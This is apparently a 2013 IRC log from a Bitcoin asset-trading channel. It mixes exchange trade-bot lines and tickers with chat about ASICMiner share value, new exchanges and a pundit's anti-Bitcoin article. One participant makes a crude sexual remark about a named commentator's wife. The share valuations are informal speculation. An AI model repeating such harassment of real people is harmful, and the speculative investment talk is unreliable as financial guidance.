Mar 31 06:04:09 [HAVELOCK] [VTX] 15 @ 0.54999999 = 8.25 BTC [+] Mar 31 06:07:09 [HAVELOCK] [VTX] 10 @ 0.54999999 = 5.5 BTC [+] Mar 31 06:11:13 are there any gox alternatives? They say 80% of btc is exchanged there Mar 31 06:16:20 there are lots of alternatives, but not really for serious trading Mar 31 06:16:24 check the markets on bitcoincharts.com Mar 31 06:16:37 there are maybe one or two alternatives that have 10% the volume of mtgox Mar 31 06:17:06 [BTCTC] [ASICMINER-PT] 1 @ 0.799 BTC [-] Mar 31 06:22:19 [BTCTC] [COGNITIVE] 1 @ 0.1563 BTC [-] Mar 31 06:23:08 [HAVELOCK] [KCIM] 4 @ 1.000001 = 4 BTC [-] Mar 31 06:28:10 [HAVELOCK] [VTX] 1 @ 0.54999997 BTC [-] Mar 31 06:28:10 [HAVELOCK] [VTX] 3 @ 0.55 = 1.65 BTC [+] Mar 31 06:44:48 !ticker m S.DICE Mar 31 06:44:50 [MPEX:S.DICE] 1D: 0.003512 / 0.00390436 / 0.0039999 (2196 shares, 8.57 BTC), 7D: 0.0031 / 0.00338792 / 0.0045 (677769 shares, 2,296.23 BTC), 30D: 0.00300001 / 0.0044567 / 0.00637777 (1648084 shares, 7,345.02 BTC) Mar 31 06:49:15 [MPEX] [S.DICE] 231 @ 0.0039999 = 0.924 BTC [+] Mar 31 06:50:11 [BTCTC] [GSDPT] 1087 @ 0.004114 = 4.4719 BTC [+] Mar 31 06:51:10 [HAVELOCK] [VTX] 1 @ 0.55 BTC [+] Mar 31 06:52:09 [HAVELOCK] [SDICE] 3 @ 0.42 = 1.26 BTC [-] Mar 31 07:06:09 [HAVELOCK] [VTX] 3 @ 0.55 = 1.65 BTC [+] Mar 31 07:06:56 [BTCTC] [S.DICE-PT] 20 @ 0.00412 = 0.0824 BTC [-] Mar 31 07:06:59 [BTCTC] [S.DICE-PT] 4 @ 0.0041 = 0.0164 BTC [-] Mar 31 07:07:05 [BTCTC] [S.DICE-PT] 1 @ 0.00406 BTC [-] Mar 31 07:07:07 [BTCTC] [S.DICE-PT] 85 @ 0.00405 = 0.3443 BTC [-] Mar 31 07:09:03 [BTCTC] [GSDPT] 10 @ 0.004 = 0.04 BTC [-] Mar 31 07:09:28 [BTCTC] [COGNITIVE] 4 @ 0.1563 = 0.6252 BTC [-] Mar 31 07:09:31 [BTCTC] [COGNITIVE] 9 @ 0.1563 = 1.4067 BTC [-] Mar 31 07:09:34 [BTCTC] [COGNITIVE] 21 @ 0.1564 = 3.2844 BTC [+] Mar 31 07:12:09 [HAVELOCK] [SDICE] 2 @ 0.42 = 0.84 BTC [-] Mar 31 07:13:54 thanks taub Mar 31 07:14:38 [BTCTC] [BASIC-MINING] 1 @ 0.379 BTC [-] Mar 31 07:15:09 [HAVELOCK] [VTX] 35 @ 0.54999998 = 19.25 BTC [-] Mar 31 07:16:09 [HAVELOCK] [SDICE] 3 @ 0.42 = 1.26 BTC [-] **** BEGIN LOGGING AT Sun Mar 31 13:03:07 2013 Mar 31 13:05:02 [HAVELOCK] [VTX] 2 @ 0.5484 = 1.0968 BTC [+] Mar 31 13:23:27 hi mircea_popescu, what are you doing here? Mar 31 13:23:40 you should be disappeared (according all these pundits) Mar 31 13:24:02 wait what ? Mar 31 13:24:13 i'm writing an article re the cypriot haircuts. Mar 31 13:25:16 get it out quickly before another country gets trimmed Mar 31 13:26:06 heh yeah. Mar 31 13:26:11 usually takes me about half an hour so, Mar 31 13:26:17 we should be safe. Mar 31 13:30:51 on reddit/btctalk most everyone "yea we know the pattern, first the loss, then founder disappears" Mar 31 13:31:10 oic Mar 31 13:31:15 sorry Mar 31 13:48:58 http://trilema.com/2013/time-for-europe-to-repeal-the-us-backed-aml-crap/ Mar 31 13:49:00 there we go. Mar 31 13:51:37 [MPEX] [S.MPOE] 2362 @ 0.00066965 = 1.5817 BTC [+] Mar 31 13:51:39 [MPEX] [S.MPOE] 2534 @ 0.00068054 = 1.7245 BTC [+] Mar 31 13:51:41 [MPEX] [S.MPOE] 5000 @ 0.00068373 = 3.4187 BTC [+] Mar 31 13:51:52 [MPEX] [S.MPOE] 5940 @ 0.00068374 = 4.0614 BTC [+] Mar 31 13:52:00 what seriously ?! Mar 31 13:52:07 dude, i wasn't going anywhere. sometimes i sleep. Mar 31 13:52:25 some other times i do other things. Mar 31 13:52:46 what you mean like in the real world? Mar 31 13:54:09 not in the real world but afk Mar 31 13:54:30 lol Mar 31 13:54:37 in the sliver between irl and afk Mar 31 13:54:50 actually come to think of it most of my life is spent in the surreal world. Mar 31 14:02:41 so what did i mis Mar 31 14:02:42 s Mar 31 14:02:45 http://adevarul.ro/locale/brasov/cum-s-a-razbunat-brasovean-pesotia-infidelae-i-a-facut-piatra-mormant-pornografica-1_515537eb00f5182b8560d57a/index.html << Mar 31 14:02:55 wife dies in car crash with lover ? make her a nice funeral stone Mar 31 14:03:18 heh Mar 31 14:08:55 ;;ticker Mar 31 14:08:56 BTCUSD ticker | Best bid: 92.61801, Best ask: 93.20000, Bid-ask spread: 0.58199, Last trade: 92.61801, 24 hour volume: 16245.29131852, 24 hour low: 90.01000, 24 hour high: 93.80000, 24 hour vwap: 92.01373 Mar 31 14:19:34 https://bitcointalk.org/index.php?topic=135914.msg1705429#msg1705429 Mar 31 14:19:36 lol idiots Mar 31 14:19:40 i told em to use bitbet Mar 31 14:20:24 [MPEX] [S.DICE] 500 @ 0.00439991 = 2.2 BTC [-] Mar 31 14:20:25 [MPEX] [S.DICE] 2000 @ 0.0043 = 8.6 BTC [-] Mar 31 14:20:27 [MPEX] [S.DICE] 1550 @ 0.00420559 = 6.5187 BTC [-] Mar 31 14:20:39 [MPEX] [S.DICE] 4375 @ 0.00397758 = 17.4019 BTC [-] Mar 31 14:20:52 [MPEX] [S.MPOE] 11550 @ 0.00065794 = 7.5992 BTC [-] Mar 31 14:20:54 [MPEX] [S.MPOE] 2350 @ 0.00065719 = 1.5444 BTC [-] Mar 31 14:22:25 !ticker m s.dice Mar 31 14:22:27 [MPEX:S.DICE] 1D: 0.003512 / 0.00417324 / 0.00439992 (16452 shares, 68.66 BTC), 7D: 0.0031 / 0.00340263 / 0.0045 (689707 shares, 2,346.82 BTC), 30D: 0.00300001 / 0.00443573 / 0.00637777 (1645302 shares, 7,298.12 BTC) Mar 31 14:22:29 [MPEX] [S.DICE] 1825 @ 0.00397758 = 7.2591 BTC [-] Mar 31 14:34:59 Anna Brandenburg Mar 31 14:34:59 research interest Mar 31 14:34:59 I am interested in questions concerning cheating and how mutualistic Mar 31 14:34:59 interactions are maintained, especially plant-pollinator interactions. Mar 31 14:42:35 http://www.youtube.com/watch?v=NhHpstDGw6Q Mar 31 14:42:41 check out that entrepreneurial dood Mar 31 14:51:02 [HAVELOCK] [VTX] 1 @ 0.5484 BTC [+] Mar 31 14:51:03 [HAVELOCK] [VTX] 11 @ 0.55 = 6.05 BTC [+] Mar 31 14:59:23 [MPEX] [S.MPOE] 9686 @ 0.00067011 = 6.4907 BTC [+] Mar 31 15:03:51 eh wut is this, matonis retweeting me. we're like friends now or something Mar 31 15:34:43 [BTCTC] [GSDPT] 28 @ 0.0043 = 0.1204 BTC [+] Mar 31 15:57:49 [MPEX] [S.MPOE] 2614 @ 0.00067011 = 1.7517 BTC [+] Mar 31 15:57:57 [MPEX] [S.MPOE] 10301 @ 0.00067137 = 6.9158 BTC [+] Mar 31 16:04:02 [HAVELOCK] [SDICE] 30 @ 0.415 = 12.45 BTC [-] Mar 31 16:04:46 omg Mar 31 16:04:47 http://www.youtube.com/watch?v=YxsA2i5cF78 Mar 31 16:04:49 taaki again Mar 31 16:04:52 srsly. Mar 31 16:05:26 "its a billion dollar market with charts and graphs and everything!" Mar 31 16:05:34 thats a quote Mar 31 16:05:45 I found out the other day apparently Taaki's mom lives just around the corner from me, and he comes down here to visit her occasionally Mar 31 16:05:52 Maybe I'll meet him one day xD Mar 31 16:07:01 kakobrekla free market. it's like one of those flemish paintings, Mar 31 16:07:03 haha lol Mar 31 16:07:11 all the mental illness and weird and sickly at the edges. Mar 31 16:07:12 then he climbs on some roof Mar 31 16:07:20 and looks on top of the city Mar 31 16:07:24 keiser-like Mar 31 16:07:28 haha Mar 31 16:07:34 idiot. Mar 31 16:08:42 i just checked and my ignore lines count is at 0 Mar 31 16:08:58 this is how it fucking works, one day it goes over 500, then a few days of 200, then 0 Mar 31 16:09:05 then a few weeks later rewash Mar 31 16:15:06 [BTCTC] [S.DICE-PT] 1 @ 0.00499 BTC [+] Mar 31 16:18:00 [MPEX] [S.MPOE] 2357 @ 0.00065719 = 1.549 BTC [-] Mar 31 16:18:02 [MPEX] [S.MPOE] 17143 @ 0.00065718 = 11.266 BTC [-] Mar 31 16:28:47 [MPEX] [S.MPOE] 29050 @ 0.00065794 = 19.1132 BTC [+] Mar 31 16:42:04 mircea_popescu : can i pm you ? Mar 31 16:42:09 surely. Mar 31 16:44:06 [BTCTC] [ASICMINER-PT] 1 @ 0.7501 BTC [-] Mar 31 16:44:11 [BTCTC] [ASICMINER-PT] 6 @ 0.75 = 4.5 BTC [-] Mar 31 16:44:16 [BTCTC] [ASICMINER-PT] 6 @ 0.74 = 4.44 BTC [-] Mar 31 16:44:19 [BTCTC] [ASICMINER-PT] 2 @ 0.74 = 1.48 BTC [-] Mar 31 16:44:21 [BTCTC] [ASICMINER-PT] 1 @ 0.735 BTC [-] Mar 31 16:44:31 [BTCTC] [ASICMINER-PT] 1 @ 0.7301 BTC [-] Mar 31 16:44:34 [BTCTC] [ASICMINER-PT] 10 @ 0.730001 = 7.3 BTC [-] Mar 31 16:44:35 [BTCTC] [ASICMINER-PT] 1 @ 0.73 BTC [-] Mar 31 16:44:37 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [-] Mar 31 16:44:49 [BTCTC] [ASICMINER-PT] 1 @ 0.72 BTC [-] Mar 31 16:44:51 [BTCTC] [ASICMINER-PT] 7 @ 0.71 = 4.97 BTC [-] Mar 31 16:44:54 [BTCTC] [ASICMINER-PT] 10 @ 0.7001 = 7.001 BTC [-] Mar 31 16:44:56 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [-] Mar 31 16:47:35 [MPEX] [S.MPOE] 21300 @ 0.00065794 = 14.0141 BTC [+] Mar 31 17:04:01 [HAVELOCK] [VTX] 1 @ 0.59 BTC [+] Mar 31 17:11:30 [BTCTC] [COGNITIVE] 3 @ 0.157 = 0.471 BTC [+] Mar 31 17:15:28 [BTCTC] [COGNITIVE] 2 @ 0.157 = 0.314 BTC [+] Mar 31 17:15:44 who was the kraken guy? Mar 31 17:16:41 https://www.kraken.com/ Mar 31 17:17:09 signup gives me 503 service unavailable anyway Mar 31 17:17:41 it's not open yet Mar 31 17:18:03 who runs it Mar 31 17:18:07 why is that name so popular Mar 31 17:18:42 because it is something that you release often Mar 31 17:18:55 this guy runs it https://bitcointalk.org/index.php?topic=159974.0 Mar 31 17:19:03 https://bitcointalk.org/index.php?topic=159974.0 Mar 31 17:19:06 heheh oops Mar 31 17:19:16 ju fast kako Mar 31 17:19:22 :p Mar 31 17:20:47 i think that one deserves the mpoe-pr link to the how to start a biz post Mar 31 17:21:52 everyone eventually reads it Mar 31 17:23:26 [BTCTC] [BASIC-MINING] 5 @ 0.38 = 1.9 BTC [+] Mar 31 17:26:59 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Mar 31 17:30:05 [MPEX] [S.MPOE] 26900 @ 0.00065533 = 17.6284 BTC [-] Mar 31 17:30:07 [MPEX] [S.MPOE] 2800 @ 0.00065474 = 1.8333 BTC [-] Mar 31 17:30:09 [MPEX] [S.MPOE] 13600 @ 0.00065226 = 8.8707 BTC [-] Mar 31 17:30:25 [MPEX] [S.MPOE] 1446 @ 0.00065164 = 0.9423 BTC [-] Mar 31 17:31:01 and to think the entire kraken bs was born out of mpoe-pr's early pirate mockery. Mar 31 17:31:34 ;;nethash Mar 31 17:31:34 57091.1887512 Mar 31 17:31:43 ;;bc,stats Mar 31 17:31:45 Current Blocks: 228927 | Current Difficulty: 6695826.282596251 | Next Difficulty At Block: 229823 | Next Difficulty In: 896 blocks | Next Difficulty In About: 5 days, 12 hours, 44 minutes, and 26 seconds | Next Difficulty Estimate: 7339752.00641 | Estimated Percent Change: 9.61682 Mar 31 17:32:02 ;;ticker Mar 31 17:32:02 BTCUSD ticker | Best bid: 93.01000, Best ask: 93.26999, Bid-ask spread: 0.25999, Last trade: 93.01000, 24 hour volume: 15740.21976489, 24 hour low: 90.01000, 24 hour high: 93.80000, 24 hour vwap: 92.28575 Mar 31 17:32:26 holding at 93 during holidays, not bad Mar 31 17:33:10 ;;estimate Mar 31 17:33:11 Next difficulty estimate | 7339752.00641 based on data since last change | 7975425.23715 based on data for last three days Mar 31 17:33:52 ;;ticker Mar 31 17:33:54 BTCUSD ticker | Best bid: 93.01002, Best ask: 93.20000, Bid-ask spread: 0.18998, Last trade: 93.20000, 24 hour volume: 15670.88422591, 24 hour low: 90.01000, 24 hour high: 93.80000, 24 hour vwap: 92.29840 Mar 31 17:34:52 [MPEX] [O.USD.C137T] 1000 @ 0.10232396 = 102.324 BTC Mar 31 17:35:01 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Mar 31 17:35:21 [BTCTC] [ASICMINER-PT] 5 @ 0.7 = 3.5 BTC [-] Mar 31 17:35:22 [BTCTC] [ASICMINER-PT] 1 @ 0.69 BTC [-] Mar 31 17:35:24 [BTCTC] [ASICMINER-PT] 1 @ 0.6841 BTC [-] Mar 31 17:35:27 [BTCTC] [ASICMINER-PT] 1 @ 0.684 BTC [-] Mar 31 17:35:31 [BTCTC] [ASICMINER-PT] 10 @ 0.681009 = 6.8101 BTC [-] Mar 31 17:35:33 [BTCTC] [ASICMINER-PT] 10 @ 0.681008 = 6.8101 BTC [-] Mar 31 17:35:36 [BTCTC] [ASICMINER-PT] 10 @ 0.681006 = 6.8101 BTC [-] Mar 31 17:35:38 [BTCTC] [ASICMINER-PT] 2 @ 0.672002 = 1.344 BTC [-] Mar 31 17:35:40 [BTCTC] [ASICMINER-PT] 5 @ 0.66 = 3.3 BTC [-] Mar 31 17:35:50 dammit i was just moving btc there Mar 31 17:36:34 honeymoon over ? Mar 31 17:37:22 no news that i know of Mar 31 17:37:31 still no new hashes tho Mar 31 17:37:48 i guess in this field no news is bad news Mar 31 17:38:22 they did move .35TH to ozcoin today Mar 31 17:38:26 whatever that means Mar 31 17:38:44 .38 Mar 31 17:38:49 roughly Mar 31 17:40:01 [HAVELOCK] [SDICE] 1 @ 0.42 BTC [+] Mar 31 17:48:27 <[\\\]> whats going on with asicminer? Mar 31 17:49:03 profit taking by shareholders that bought at lower price? Mar 31 17:49:18 <[\\\]> nice Mar 31 17:50:01 [HAVELOCK] [SDICE] 3 @ 0.4 = 1.2 BTC [-] Mar 31 17:50:17 [\\\] they missed their window. Mar 31 17:50:31 <[\\\]> at this point, who hasn't? Mar 31 17:51:01 [HAVELOCK] [SDICE] 1 @ 0.3975 BTC [-] Mar 31 17:51:02 [HAVELOCK] [SDICE] 1 @ 0.397 BTC [-] Mar 31 17:51:04 [HAVELOCK] [SDICE] 1 @ 0.397 BTC [-] Mar 31 17:51:16 s.dice cleared a juicy 50k in its ipo. Mar 31 17:51:20 asicminer holders got what, 1k ? 2 ? Mar 31 17:52:01 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Mar 31 17:52:29 <[\\\]> no Mar 31 17:52:39 <[\\\]> they sold lke 163k units Mar 31 17:52:42 <[\\\]> at .1 Mar 31 17:52:58 yeah. and then those people held the bag for ~1year Mar 31 17:53:01 [HAVELOCK] [SDICE] 2 @ 0.39600001 = 0.792 BTC [-] Mar 31 17:53:05 <[\\\]> there were some bulk buys at slightly cheaper Mar 31 17:53:09 and then when their purchase struck gold and they had their liquidity event Mar 31 17:53:11 they couldn't divest. Mar 31 17:53:19 so... you know, every shareholder got fucked. Mar 31 17:53:20 <[\\\]> I did :) Mar 31 17:53:28 but luckily people aren't clever enough to figure it out, so it's all good. Mar 31 17:54:16 <[\\\]> I do find it interesting how they swung from "We're gonna sell" at the beginning to "We're not gonna sell" in the middle to "We're gonna sell" Mar 31 17:54:21 so where do you place AM share value? Mar 31 17:54:21 <[\\\]> hardware that is Mar 31 17:54:40 <[\\\]> considering they paid out the IPO price already Mar 31 17:54:47 <[\\\]> and now all shares get half of that going forward Mar 31 17:54:58 <[\\\]> meanwhile difficulty continues to go up and they continue to roll ou the original batch Mar 31 17:55:05 <[\\\]> while withholding dividends to buy more Mar 31 17:55:17 yes, all things considered Mar 31 17:55:21 hehe Mar 31 17:55:32 <[\\\]> I think .5 is very optimistic Mar 31 17:55:50 heh. a well. Mar 31 17:55:59 <[\\\]> Yes, they'll sell hardware but its an older tech Mar 31 17:56:00 not sure if i agree Mar 31 17:56:07 <[\\\]> they're gonna have to do a bunch of R&D Mar 31 17:56:21 <[\\\]> meanwhile, the rest of the crowd on the smaller processes are doing their own R&D Mar 31 17:56:28 <[\\\]> trying to leapfrog will be stupid hard Mar 31 17:56:52 https://bitcointalk.org/index.php?topic=159935.msg1709554#msg1709554 Mar 31 17:56:59 i can hear the butthurt storm form here Mar 31 17:59:14 <[\\\]> How is that good PR for MPOE? Mar 31 18:00:38 it's not pr at all, it's csr. Mar 31 18:01:40 <[\\\]> can't stand retards? Mar 31 18:01:46 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Mar 31 18:01:56 <[\\\]> ThickAsThieves, then what's your value? Mar 31 18:02:03 <[\\\]> if .5 is so terrible Mar 31 18:02:29 i think a safe value, is whatever amounts to 3.5%+ monthly divs Mar 31 18:03:16 <[\\\]> ;;calc 0.0151/.03 Mar 31 18:03:16 0.503333333333 Mar 31 18:03:20 <[\\\]> my value Mar 31 18:03:22 <[\\\]> what do you know Mar 31 18:03:31 so can go higher Mar 31 18:03:40 <[\\\]> no Mar 31 18:03:46 <[\\\]> thats not how difficulty works Mar 31 18:03:52 [\\\] corporate social responsibility. Mar 31 18:04:03 <[\\\]> mircea_popescu, no Mar 31 18:04:35 \\\, your div is half what i figure Mar 31 18:04:55 <[\\\]> ThickAsThieves, how do you plan to pay for the new hardware? Mar 31 18:05:06 <[\\\]> how about the R&D? Mar 31 18:05:21 this week and next are weeks where divs are cut Mar 31 18:05:28 i should say Mar 31 18:05:31 last weeks div Mar 31 18:05:35 and next div Mar 31 18:05:39 <[\\\]> how about when the local Chinese government decides they awnt to get in on the action? Mar 31 18:05:48 last dive was a bout .007? Mar 31 18:05:51 <[\\\]> or what happens when BFL actually rolls out their hardware and diff goes up even faster Mar 31 18:05:56 so let's just use that Mar 31 18:06:13 .007 * 4.33 = .03031 Mar 31 18:06:19 monthly Mar 31 18:06:47 dive=div Mar 31 18:07:01 <[\\\]> I find it interesting how optimistic shareholders can be Mar 31 18:07:18 well it's not like i'm buying shares at 1btc Mar 31 18:07:27 <[\\\]> why not? Mar 31 18:07:33 <[\\\]> if you think things are so undervalued Mar 31 18:07:38 <[\\\]> and its trading at .6 or .7 Mar 31 18:07:39 because they can be had for .65 Mar 31 18:07:44 <[\\\]> the buy should be making sense Mar 31 18:07:50 <[\\\]> you should be borrowing funds to buy more Mar 31 18:07:52 <[\\\]> its cheap! Mar 31 18:08:10 i dont borrow for investing Mar 31 18:08:59 i do have about 20-40btc more i'll spend on low market AM shares though Mar 31 18:09:07 <[\\\]> why not? Mar 31 18:09:12 <[\\\]> if its making .03% a month Mar 31 18:09:21 <[\\\]> err 3% Mar 31 18:09:32 <[\\\]> then you can pay 1% month and be making even MOAR Mar 31 18:09:55 you are jumping from me saying somehting has more value you than you think, to saying i think it has no risk Mar 31 18:09:57 silly Mar 31 18:11:00 [HAVELOCK] [SDICE] 2 @ 0.434 = 0.868 BTC [+] Mar 31 18:11:08 <[\\\]> the more risky something is, generally the less valuable it is due ot the negative EV Mar 31 18:11:20 you are oversimplifynig Mar 31 18:11:28 i still have room to arb low-cost shares Mar 31 18:11:33 and many other factors Mar 31 18:11:41 [MPEX] [S.MPOE] 11654 @ 0.00065164 = 7.5942 BTC [-] Mar 31 18:11:43 [MPEX] [S.MPOE] 746 @ 0.00065134 = 0.4859 BTC [-] Mar 31 18:11:54 <[\\\]> what you do with shares has nothing to do with company 'value' Mar 31 18:12:01 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Mar 31 18:12:20 why would you assume i'd put company value over my own position Mar 31 18:12:28 these are dynamic factors Mar 31 18:15:09 [BTCTC] [ASICMINER-PT] 1 @ 0.779 BTC [+] Mar 31 18:17:01 [HAVELOCK] [SDICE] 2 @ 0.434 = 0.868 BTC [+] Mar 31 18:18:23 [17:56] https://bitcointalk.org/index.php?topic=159935.msg1709554#msg1709554 Mar 31 18:18:27 lol, they're using mongodb Mar 31 18:18:39 are they for fucking real Mar 31 18:21:00 [HAVELOCK] [VTX] 1 @ 0.6 BTC [+] Mar 31 18:22:17 [BTCTC] [COGNITIVE] 1 @ 0.151001 BTC [-] Mar 31 18:23:21 <[\\\]> Scrat, at least its not MS Access Mar 31 18:28:24 this is a textbook example of 2 multistatement queries arriving at the same time on a database that can't do transactional locking Mar 31 18:29:21 you have to use mongodb to be picked up by ycombinator Mar 31 18:29:34 pigeons: correct Mar 31 18:29:42 you're allowed to use Go now if you don't want to use rails Mar 31 18:29:57 or scheme Mar 31 18:30:00 [HAVELOCK] [SDICE] 2 @ 0.433 = 0.866 BTC [-] Mar 31 18:30:04 since graham likes scheme Mar 31 18:30:13 if you go with the trifecta (node/mongo/redis) YC will refuse NOT to accept you Mar 31 18:30:44 wow! Mar 31 18:30:51 then I can make like $7k just like that Mar 31 18:31:00 get "rich" quick scheme Mar 31 18:32:08 copumpkin: I'll let you in on a secret Mar 31 18:32:16 copumpkin: lobster.ttf Mar 31 18:32:31 100% guaranteed vulture capital Mar 31 18:33:02 whisper "bootstrap" into dustin hoffman's ear Mar 31 18:33:28 :O Mar 31 18:33:52 Scrat: I see what you mean Mar 31 18:34:00 it's amazing I have not picked up on this sooner Mar 31 18:38:50 ;;seen smickles Mar 31 18:38:50 smickles was last seen in #bitcoin-assets 1 day, 13 hours, 32 minutes, and 28 seconds ago: oh, it just changed Mar 31 18:48:03 Scrat hm ? Mar 31 18:49:00 you have to use mongodb to be picked up by ycombinator << heh. Mar 31 18:50:53 what i find funniest in all this recent coin* drama is piuk's haste to divest from any relation to anything that may even be vaguely related to yshit. Mar 31 18:50:56 i think it speaks volumes. Mar 31 18:51:14 mircea_popescu: what Mar 31 18:52:06 i dunno, you hilighted me Mar 31 18:52:26 also http://sphotos-g.ak.fbcdn.net/hphotos-ak-snc7/484142_487005764686476_40092274_n.jpg Mar 31 18:53:02 [MPEX] [S.MPOE] 21254 @ 0.00065134 = 13.8436 BTC [-] Mar 31 18:53:04 [MPEX] [S.MPOE] 14662 @ 0.0006506 = 9.5391 BTC [-] Mar 31 18:55:29 Shave ya snatch https://si0.twimg.com/profile_images/110479356/dial-100.jpg Mar 31 18:57:11 [BTCTC] [BASIC-MINING] 2 @ 0.38 = 0.76 BTC [+] Mar 31 18:57:22 ;;seen smickles Mar 31 18:57:22 smickles was last seen in #bitcoin-assets 1 day, 13 hours, 51 minutes, and 1 second ago: oh, it just changed Mar 31 18:57:47 [BTCTC] [S.DICE-PT] 2 @ 0.00499 = 0.01 BTC [+] Mar 31 19:04:50 [MPEX] [S.MPOE] 3685 @ 0.00064633 = 2.3817 BTC [-] Mar 31 19:06:33 [MPEX] [S.MPOE] 15600 @ 0.00064772 = 10.1044 BTC [+] Mar 31 19:08:39 ;;ticker Mar 31 19:08:39 BTCUSD ticker | Best bid: 92.81704, Best ask: 93.35000, Bid-ask spread: 0.53296, Last trade: 92.81603, 24 hour volume: 15140.92464305, 24 hour low: 90.20220, 24 hour high: 93.80000, 24 hour vwap: 92.43116 Mar 31 19:09:54 [BTCTC] [SYNERGY] 1 @ 0.00671 BTC [-] Mar 31 19:09:57 [BTCTC] [SYNERGY] 2 @ 0.00671 = 0.0134 BTC [-] Mar 31 19:10:40 [BTCTC] [SYNERGY] 3 @ 0.0067 = 0.0201 BTC [-] Mar 31 19:11:01 [HAVELOCK] [VTX] 1 @ 0.601 BTC [+] Mar 31 19:21:00 [HAVELOCK] [HIM] 1 @ 2.01 BTC [-] Mar 31 19:25:00 [HAVELOCK] [KCIM] 2 @ 1.209 = 2.418 BTC [+] Mar 31 19:25:49 ;;seen smickles Mar 31 19:25:49 smickles was last seen in #bitcoin-assets 28 minutes and 26 seconds ago: ;;seen smickles Mar 31 19:26:00 [HAVELOCK] [SDICE] 2 @ 0.4329999 = 0.866 BTC [-] Mar 31 19:27:00 [HAVELOCK] [VTX] 3 @ 0.6099 = 1.8297 BTC [+] Mar 31 19:29:00 [HAVELOCK] [SDICE] 3 @ 0.4329999 = 1.299 BTC [-] Mar 31 19:30:00 [HAVELOCK] [KCIM] 6 @ 1.209 = 7.254 BTC [+] Mar 31 19:30:18 [BTCTC] [BASIC-MINING] 35 @ 0.38 = 13.3 BTC [+] Mar 31 19:32:00 [HAVELOCK] [SDICE] 1 @ 0.433 BTC [+] Mar 31 19:32:41 mr. smickles where is you! Mar 31 19:33:29 :( Mar 31 19:35:11 [BTCTC] [BASIC-MINING] 10 @ 0.38 = 3.8 BTC [+] Mar 31 19:42:12 I lik ehow Bitcointroll.org goes to bitcointalk Mar 31 19:47:00 [HAVELOCK] [VTX] 4 @ 0.6099 = 2.4396 BTC [+] Mar 31 19:47:20 ;;seen smickles Mar 31 19:47:21 smickles was last seen in #bitcoin-assets 49 minutes and 58 seconds ago: ;;seen smickles Mar 31 20:09:14 [MPEX] [S.DICE] 5000 @ 0.004 = 20 BTC [+] Mar 31 20:11:49 http://market-ticker.org/akcs-www?singlepost=3171400 Mar 31 20:11:52 teh haet. Mar 31 20:14:01 [HAVELOCK] [HIM] 2 @ 2.01 = 4.02 BTC [-] Mar 31 20:14:53 damn it I shoiuld have withdrawn coin from smickles with all this havelock trades going on Mar 31 20:14:57 ugh Mar 31 20:16:38 Denninger can suck it Mar 31 20:17:01 remarkably flawed arguments he has. Mar 31 20:17:10 If you have to write up something so convoluted to trash bitcoin that I can't even understand what your argument is, you have a problem Mar 31 20:17:12 He owns bitcoin, wants more, trying to get the price down. Mar 31 20:17:19 he doesn't own bitcoin Mar 31 20:17:23 he fails to realise that the link between address and physical person is optional to the person Mar 31 20:17:27 and just assumes it as a given Mar 31 20:17:32 he fails to understand that the Mar 31 20:17:35 I have been reading him since 07 Mar 31 20:17:49 'duties" of the segnior are easily, and discretely, accimplished by the bitcoin holders. Mar 31 20:17:58 whoever doesn't sell in a market downturn is doing exactly that. Mar 31 20:18:36 He is pretty good at analysis of traditional financial markets, but gets himself into trouble whenever he leaves his narrow zone of expertise Mar 31 20:18:42 this is starting to become characteristic of the older teapartiers... i'd call it truthstranding Mar 31 20:18:50 they get a strand of truth and run with it, in the process breaking it off. Mar 31 20:18:57 yeah. Mar 31 20:19:03 who? Mar 31 20:19:10 Karl Denninger Mar 31 20:19:15 we're discussingdenninger's recent nonsense, you came halfway in Mar 31 20:19:37 One of the first people that really nailed the call of the housing collapes and financial panic Mar 31 20:19:39 i'm forever halfway in Mar 31 20:19:54 ah yes, okay. spun up. Mar 31 20:19:57 but since 2008, if you followed his guidance you would have lost a lot of gains. Mar 31 20:20:15 Bugpowder in fairness tho, i'd rather see this sort of mistaken argument than the outright meaningless drivel from kruger&monkey co Mar 31 20:20:39 I just can't be bothered to parse what he has written there Mar 31 20:20:45 is so obtuse and confused Mar 31 20:20:51 kinda. Mar 31 20:20:51 [MPEX] [S.MPOE] 1871 @ 0.00064633 = 1.2093 BTC [-] Mar 31 20:20:53 [MPEX] [S.MPOE] 5301 @ 0.00064364 = 3.4119 BTC [-] Mar 31 20:21:02 [MPEX] [S.MPOE] 7528 @ 0.00064363 = 4.8452 BTC [-] Mar 31 20:21:20 i wish people would have the sense to /join #bitcoin-assets herpderp here's my new theory!!1 Mar 31 20:21:22 first. Mar 31 20:21:44 get laughed to shit, straighten their head, live happier lives. Mar 31 20:22:07 most people don't straighten their heads after suffering others laughter Mar 31 20:22:21 anyway, I'm banned from commenting on the subforum related to his market ticker posts. Mar 31 20:22:25 so, why bother Mar 31 20:22:28 ahahaha what ? Mar 31 20:22:40 he bans you whenever he disagrees with you Mar 31 20:22:46 sigh Mar 31 20:22:49 Bugpowder: Did you get the bondholders their money back? Mar 31 20:23:04 :D Mar 31 20:23:40 this is how the market-ticker forums turned from a good resource of market analysis back in 2007-2008 into a sycophantic group of blathering teabaggers. Mar 31 20:23:52 WTS G.SDICE,G.MPOE, G.BBET, TU.Silver and BTCQuick shares! Pm me with offer :) Mar 31 20:24:38 I made a very soft rebuttal to one of his tickers, boom. Banned from posting Mar 31 20:25:06 what was it that the inimitable jove said about fools? Mar 31 20:25:10 he's lucky he doesn't have me there i guess Mar 31 20:25:10 In other news, Audi's a fucking over priced. Mar 31 20:25:22 you would be banned immediately Mar 31 20:25:27 Bugpowder i think tiberiusiv can get you a deal. Mar 31 20:25:29 you may be prebanned Mar 31 20:25:35 "a wise man once told me/don't argue with fools/'cause at a distance/people can't tell who's who" Mar 31 20:25:54 Bugpowder why, just because i'd post bbq's of his wife doing donkey dongs ? Mar 31 20:27:11 wtf bbq? Mar 31 20:27:48 wtfbbq indeed Mar 31 20:30:19 [BTCTC] [COGNITIVE] 3 @ 0.157 = 0.471 BTC [+] Mar 31 20:31:00 [HAVELOCK] [SDICE] 1 @ 0.43997999 BTC [+] Mar 31 20:36:00 [HAVELOCK] [SDICE] 1 @ 0.43998 BTC [+] Mar 31 20:37:05 ;;ticker Mar 31 